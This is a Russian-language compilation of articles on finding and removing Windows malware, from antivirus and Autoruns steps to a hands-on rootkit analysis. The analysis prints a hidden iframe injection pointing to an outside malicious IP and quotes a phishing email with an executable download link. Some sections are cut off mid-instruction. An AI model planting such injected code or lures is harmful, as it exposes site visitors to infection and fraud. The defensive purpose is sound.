Проблемы        29.12.2022   

Вирусы и как их удалить. Как убрать вирус, который завелся на вашем компьютере. Что следует предпринять

Скачайте Autoruns. Это программа, созданная Microsoft TechNet, которая определяет процессы, запускаемые при загрузке системы. Так вы получите представление о том, что работает на вашем компьютере в настоящий момент.

  • Скачав архив с программой, распакуйте его в легкодоступную папку, например, в C:\Autoruns.
  • Запустите программу и посмотрите, как в ней отображаются службы и программы, запускаемые при загрузке Windows. Интерфейс программы довольно сложный, но вам необходимо сосредоточиться только на некоторых областях в окне программы.

Настройте программу. Чтобы вам было легче найти вредоносный код, исключите службы Microsoft и включите проверку тех мест, которые обычно не сканируются. Для этого нажмите «Настройки» – «Настройки фильтра». Включите следующие опции:

  • «Включать пустые локации»
  • «Проверять подписи кода»
  • «Скрывать элементы с цифровой подписью Microsoft»

  • Загрузите компьютер в безопасном режиме с поддержкой сетевых драйверов. Большинство вирусов запускаются при загрузке Windows за счет прикрепления к системным службам. Поэтому загрузите компьютер в безопасном режиме, в котором запускаются только самые необходимые службы, что поможет вам найти и обезвредить вирус.

    • Безопасный режим с поддержкой сетевых драйверов (а не просто безопасный режим) позволит вам пользоваться интернетом для поиска программ.

  • Запустите программу Autoruns. Дважды проверьте правильность настроек фильтра программы. Дождитесь окончания сканирования (на это уйдет некоторое время).

  • Найдите подозрительные элементы. Это самый скучный этап, потому что вам придется проверять в сети каждый подозрительный элемент, чтобы убедиться, что он является или не является вредоносным кодом. Обратите внимание на имя элемента и его местоположение.

    • В сети есть базы данных по многочисленным компьютерным процессам; такие базы помогут вам выяснить, является ли определенный процесс вирусом или нет. Популярными базами данных являются Process Library, Bleeping Computer, File.net.
    • Сфокусируйтесь на вкладках «Вход в систему» и «Службы». При этом не стоит игнорировать другие вкладки, так как вирусы могут отображаться на этих вкладках.
    • Не торопитесь. Избавление от нужного процесса может привести к сбоям в системе, поэтому дважды проверьте каждый подозрительный процесс, прежде чем отметить его для последующего удаления.
    • Перед удалением вредоносного элемента запишите местоположение его файла. Позже вы найдете и удалите этот файл.

  • Удалите вредоносные элементы. Удостоверившись, что тот или иной элемент является вредоносным, щелкните по нему правой кнопкой мыши и выберите «Удалить». Это удалит элемент из автозагрузки, но не удалит вредоносный (зараженный) файл.

    • Удалите вредоносный элемент, а затем удалите связанный с ним файл. Повторите этот процесс с каждым подозрительным элементом. Так вы не забудете удалять зараженные файлы.

  • Удалите файлы, связанные с удаленным элементом. Откройте проводник Windows и перейдите в папку, в которой хранится зараженный файл. Если вы не видите этот файл, .

    • Удалите вредоносный элемент, а затем удалите связанный с ним файл. Повторите этот процесс с каждым подозрительным элементом.

    • Наверное, каждый пользователь персонального компьютера сталкивался с такой проблемой, как компьютерный вирус. Это довольно неприятное ощущение, когда понимаешь, что сейчас можно ожидать практически любого исхода: удалятся важные файлы, «слетит» вся операционная система, перестанет работать Интернет и т.п. Поэтому если Вы обнаружили или даже просто заподозрили на своем компьютере вирус, то его срочно нужно удалить, и о том, как это сделать правильно мы и поговорим в нашей сегодняшней статье.

    10 шагов, которые помогут удалить практически любой вирус из системы


    1. Загрузите и установите антивирусник. Первым делом Вы должны доверить всю работу по удалению вируса специальной программе (антивирусу), так как именно она способна справиться со всем вредоносным кодом деликатно, а главное правильно. Так как простое удаление зараженного файла может не спасти всю ситуацию. Иногда вообще удалять вирусный файл крайне опасно, так как он может нести в себе важную системную информацию. В таких случаях нужно проводить либо замену конкретного файла на не зараженный, либо его редактирование с последующим удалением кода, который отвечает за работу вируса. Загружать антивирус нужно исключительно с официального сайта и устанавливать только легальную лицензию, ведь тогда Вы рискуете не только НЕ удалить вирусы с компьютера, но и занести новые. Иногда загрузку и установку антивируса нужно запускать в безопасном режиме, иначе Вы не получите доступа ко всем файлам системы.

    2. Обновите базы антивируса. После того, как антивирус установился на ПК, первым делом следует обновить базы антивируса, так как на нём по умолчанию должны быть загружены базы старого образца, в которых отсутствуют алгоритмы новых вирусных программ. Вы, конечно же, можете провести проверку и на старых базах, и вирус возможно даже будет удален, однако если он успел заразить другие файлы уже иным (ещё не изученным) способом, то Вы так и не удалите весь вредоносный код с компьютера. Всегда следите за обновлениями антивирусных баз и проверяйте их наличие вручную.

    3. Отключите Интернет. Если Вы уже загрузили нужную антивирусную программу, установили её, а также успели обновить, то на этом этапе мы настоятельно рекомендуем отключить компьютер от сети Интернет. Причем сделать это лучше самым надёжным образом – выдернув сетевой кабель из системного блока или полностью отключив Wi-Fi (если используете беспроводное соединение). Сделать это нужно в первую очередь для безопасности Ваших данных, так как вирус может через сеть Интернет передавать все документы и файлы, которые находятся в системе. Если же вирус внедрит (установит) разнообразные антиблокировки сети Интернет, то у Вас даже не получится отключить сеть, пока кабель не будет высунут из компьютера или роутера.

    4. Запустите глубокую проверку компьютера. Даже если Вы знаете конкретную папку, где находится вирус, мы всё равно рекомендуем запустить полный и глубокий анализ (проверку) системы. Дело в том, что вирусы, а особенно троянские, являются неким порталом для вредоносных программ, таким образом, фактически вредоносных программ окажется куда больше, чем этот единственный файл (для этого пунктом ранее мы и закрыли доступ в сеть). Да, глубокая проверка займет массу времени, особенно если жесткий диск забит архивами и документами и другими файлами, на которые уходит гораздо больше времени, чем на медиа-файлы (фильмы, музыку, картинки и т.п.).

    5. Удалите вирус вручную. Иногда вирусы бывают настолько мощными и совершенными, что без самостоятельного вмешательства здесь просто не обойтись. Поэтому приходиться удалять зараженные файлы или сами вирусы вручную. Однако если Вы не уверены в правильности своего решения и не знаете, действительно ли здесь есть вредоносный код, то в таком случае специалисты сайт рекомендуют поступать следующим образом. Сперва перенести подозрительные файлы на сторонний носитель (флешку, CD-диск, внешний жесткий диск и т.д.), а на самом компьютере полностью удалить их (очистив корзину). Если после перезагрузки, всё работает нормально, то значит, важных файлов Вы не удалили, однако если что-то пошло не так, то и здесь нет смысла паниковать или расстраиваться, ведь у Вас есть сохранённые данные на стороннем носителе.

    6. Проверьте компьютер ещё одной антивирусной программой. После того, как вирус будет окончательно удален из системы, мы рекомендуем убедиться в этом ещё раз. Для этого Вам необходимо повторно проверить операционную систему на наличие вредоносных программ. Однако сделать это лучше иной антивирусной программой. Можно воспользоваться, как иным антивирусом (однако для этого придется удалить существующий, перезагрузить ПК и установить новую антивирусную программу), так и воспользоваться таким продуктом, как например, Dr.Web CureIt! Последний представляет собой утилиту, которую ненужно устанавливать, а достаточно лишь скачать и запустить проверку (причем данное программное обеспечение полностью легально и бесплатно для пользователей, которые будут использовать программу Dr.Web CureIt! исключительно для личных и некоммерческих целей). Данный продукт отлично дополняет Kaspersky Internet Security, если он установлен как постоянный антивирусник на Вашем компьютере.

    7. Установите хорошую антивирусную программу, которая бы смогла защитить интернет-соединение. Если Вы активный пользователь сети Интернет, то в первую очередь после удаления вируса Вы должны позаботиться о том, чтобы он опять не появился. Самым простым способом будет установка антивирусной программы, которая бы специализировалась на безопасном использовании сетевых благ. Лучшим в этом сегменте является Kaspersky Internet Security, о котором мы уже упоминали в предыдущем пункте. В принципе, данное программное обеспечение не требует особых настроек, так как по умолчанию в него уже внесены все базовые методы безопасности. Усилить безопасность сможете вручную, внеся желаемые изменения в настройках.

    8. Проверьте ещё раз файлы, папки и архивы, которые могут также быть зараженными (особенно на сторонних носителях). Удалив вирус с компьютера, мы очень часто забываем о флешках, внешних жестких дисках и записанных компакт-дисках, а ведь очень часто вирус заселяется именно на этих носителях. Потом понять не можем – вроде бы и вирус удалили, но проблемы остались. Поэтому проверить все эти носители нужно точно также антивирусной программой, однако делать это нужно весьма аккуратно – не открывая проводник и не просматривая содержимое папки, чтобы не дать вирусу запуститься. Естественно проверять каждый из носителей следует тщательно, чтобы быть уверенным в своих устройствах.

    9. Установите антивирусную программу AVZ. Несмотря на то, что утилита ещё не очень известна среди большинства пользователей компьютеров (хотя её очень хорошо знаю те, кто «лечил» свой ПК при помощи данного ПО), она достаточно хорошо справляется с такими вирусами, как: SpyWare (программное обеспечение, которое создано, для того чтобы шпионить за пользователем). AVZ способно справиться и с AdWare (нелегальная реклама, которая вставляется в браузер и другие программы). BackDoor (вирус, который выносит все Ваши пароли и личную информацию в Интернет) также будет найден данной утилитой. И естественно данная программа способна удалять с зараженного компьютера обычных троянских программ.

    10. Переустановите операционную систему. Запомните очень простое правило – если не удается удалить вирус с компьютера, то Вы всегда можете переустановить Windows, что в сумме займет гораздо меньше времени, чем на попытки решить проблему иным путём . Да, мы согласны, что далеко не всегда можно избежать вируса просто переустановив систему, ведь вирус может прятаться на ином разделе жесткого диска, который так и останется нетронутым, однако шанс развития такой ситуации достаточно мал, т.к. вирусы селятся в основном там, где находятся все важные файлы по управлению системой. Если же Вы можете удалять и другие разделы жесткого диска, то это было бы просто замечательно, так как после их форматирования уж точно никаких вирусов нельзя будет найти на ПК.

    11. Сделайте выводы. И последний шаг на пути к полному удалению вируса с компьютера призывает Вас (пользователей компьютера), сделать выводы о том, почему, когда и как был заражен Ваш компьютер. Естественно сделайте выводы о том, как этого можно было избежать. Запомните всё, прокрутите несколько раз в голове и никогда больше не повторяйте подобных ошибок. Ведь куда проще избежать заражения вирусом, чем потом удалять и лечить зараженные файлы, которые возможно будут содержать для Вас ценную информацию.

    Поймали вирус в браузере, и теперь постоянно выскакивает реклама? Это ужасно раздражает. Да и вылечить браузер от вирусов не так-то просто. Их еще нужно найти, а многие современные антивирусы попросту не видят эту заразу. Собственно, поэтому у вас и появляются всплывающие окна, а также постоянно открываются рекламные страницы (например, Вулкан или других казино).

    Так что делать, если браузер заражен вирусом? Найти и избавиться от него 🙂 . Специально для этого ниже приведено 6 эффективных способов, как удалить вирус из браузера. А в качестве бонуса – пару полезных советов о том, как защитить свой компьютер или ноутбук от повторного заражения.

    Как понять, что браузер был заражен? Это можно увидеть по следующим симптомам:

    Откуда в браузере появляются вирусы

    Современные пользователи очень часто устанавливают игры, программы, расширения и вообще не смотрят, что именно ставят. Просто нажимают «Далее, далее, готово» – и вот еще один рекламный вирус незаметно пролез в вашу систему Windows. В результате появляются всплывающие окна, открываются рекламные страницы и пр.

    И в 99% случаев виноват сам пользователь. Почему? Да потому, что обычно лечение браузера от вирусов требуется после:


    Сюда же можно добавить отсутствие антивируса на ПК или ноутбуке. Конечно, от всех вирусов он вас не защитит, но некоторые все же обнаружит и удалит. А если думать головой и вручную проверять подозрительные файлы антивирусом, это поможет вам избежать многих проблем. В этом можете быть уверены.

    Как почистить браузер от вирусов и рекламы

    С причинами и симптомами вирусов разобрались, теперь перейдем к главному. Итак, как избавиться от рекламного вируса в браузере? Здесь все зависит от того, какую именно заразу вы словили. Впрочем, ниже приведена пошаговая инструкция, выполнив которую вы сможете вылечить браузер от различных рекламных вирусов.

    Она является универсальной и подходит для любого интернет-браузера – Google Chrome, Opera, Mozilla Firefox, Yandex Browser, Microsoft Edge. Так что пользоваться ею могут все пользователи.

    Итак, чтобы избавиться от вирусов в браузере, выполните следующие действия:

    Запустите полную проверку ПК или ноутбука антивирусом

    Проверьте дополнения в браузере

    Некоторые расширения устанавливаются сами. Поэтому зайдите в браузер и проверьте, есть ли там дополнения, которые вы не ставили. Также рекомендуется удалить те из них, которыми не пользуетесь.

    Проверьте установленные приложения

    Чтобы открыть их, перейдите в Пуск – Панель управления – Программы и компоненты.

    Иногда вредоносные модули устанавливаются как обычный софт (например, Webalta). Чтобы удалить вирус, запускающий рекламу в браузере, достаточно лишь найти его и удалить из этого списка.

    Проверьте ярлык браузера

    Если после его запуска сразу открывается страница Вулкана или другого рекламного сайта, то, скорее всего, проблема кроется в ярлыке. Иногда вирусы прописывают в свойствах ярлыка (в поле «Объект») адрес сайта, который и открывается при запуске браузера. Чтобы решить эту проблему, удалите ярлык и создайте новый.

    Проверьте файл hosts

    Также многие вирусы редактируют и этот файлик. В результате при открытии какого-то популярного веб-сайта открывается другой (внешне он выглядит так же, и разницы вы не заметите). А далее появляются сообщения с просьбой отправить смс, всплывающие окна, агрессивная реклама и т.д. Убрать этот рекламный вирус можно двумя способами. Первый – с помощью антивирусной утилиты AVZ. А второй – вручную. Для этого:

    1. Перейдите по пути C:\Windows\System32\drivers\etc.
    2. Откройте файл hosts через блокнот.
    3. Удалите лишние строчки. Нормальный файл hosts должен выглядеть следующим образом:

    Программы для очистки браузера от вирусов

    Также существуют специальные программы для удаления вирусов в браузере. Они видят то, что пропустили антивирусы и помогают избавиться от вредоносных рекламных модулей.

    AdwCleaner

    Первая отличная программа для очистки браузера от рекламы и вирусов – AdwCleaner (ссылка на оф. сайт).

    Эта утилита выполнит быстрый поиск вирусов в браузере и найдет все рекламные тулбары, баннеры, вредоносные скрипты. Также умеет осуществлять очистку ярлыков, файлов и реестра.

    Malwarebytes

    Еще одна эффективная программа для чистки браузеров от вирусов. Быстро просканирует ПК или ноутбук и поможет избавиться от всплывающих окон и надоевшей рекламы (ссылка на оф. сайт).Ее возможностей более чем предостаточно, чтобы найти вирус в браузере и удалить его.

    Защита браузера от рекламы и вирусов

    И напоследок, как и обещал, приведу несколько полезных советов о том, как защитить браузер от вирусов:

    1. Установите на ноутбук или ПК антивирус. Можно бесплатный. Главное – не забывайте обновлять его (или включите автообновление). В половине случаев он поможет вам удалить вирус из браузера. А точнее – не допустить заражения. Рекомендую прочитать: .
    2. Установите программу для удаления рекламных вирусов. То, что пропустят антивирусы, заметят специальные утилиты вроде AdwCleaner или HitmanPRO. При таком сочетании ни одна зараза на ваш ПК просто не пролезет. А для собственного спокойствия периодически запускайте проверку браузера на вирусы (например, 1 раз в месяц).
    3. Установите расширение в браузере для блокировки рекламы. Это может быть Adblock или Adguard – на ваше усмотрение. А если захотите отключить рекламу на любимом сайте или блоге (чтобы поддержать его владельца материально), просто добавьте этот веб-ресурс в исключение.

    И самое главное: думайте головой! Не загружайте подозрительные exe-файлы (особенно, если вам нужен фильм в формате avi или mkv), не переходите по неизвестным ссылкам, не заходите на сомнительные сайты.

    Как говорится, самый лучший антивирус – тот, который сидит по ту сторону монитора 🙂 . То есть, пользователь. Если же вы будете нарушать вышеописанные правила, то никакой антивирус вам не поможет. В интернете нужно быть предельно осторожным – помните об этом!

    Что делать, если антивирус не справился со своей работой.

        Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

    Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

    Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

    Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

  • запустить редактор групповых политик gpedit.msc
  • перейти в "Конфигурация компьютера" - - "Конфигурация Windows" - "Административные шаблоны" - "Компоненты Windows" - "Политика автозапуска".
  • установить значение "Вкл." для компонента "Отключить автозапуск"

    •     Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

        Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

    iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

    Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

        В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

        Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

        Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

    Здравствуйте.
    Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
    наш фирменный бланк резюме и отправить его по адресу [email protected]
    Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
    позвоним Вам в течение нескольких дней. Не забудьте
    указать телефон, а также позицию, на которую Вы претендуете. Желательно
    также указать пожелания по окладу.
    Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
    http://verano-konwektor.pl/resume.exe

        Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

        Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
        Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
        Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
        Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
        Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
        Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
        Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

    Определяем наличие вируса в системе.

    1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

    2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

        Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
        Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

    Удаляем вирус из системы.

        Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

    Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

    Выбираем систему (если их несколько):

    Вводим пароль администратора.
    Список драйверов и служб можно просмотреть с помощью команды listsvc:

    В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

    Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

        Водим команду EXIT и система уходит на перезагрузку.
    После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
        Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

        Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
        Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
    Разделы:
    Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
    Network - то же, но с поддержкой сети.

    Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

        Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
    ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

        Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

        Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

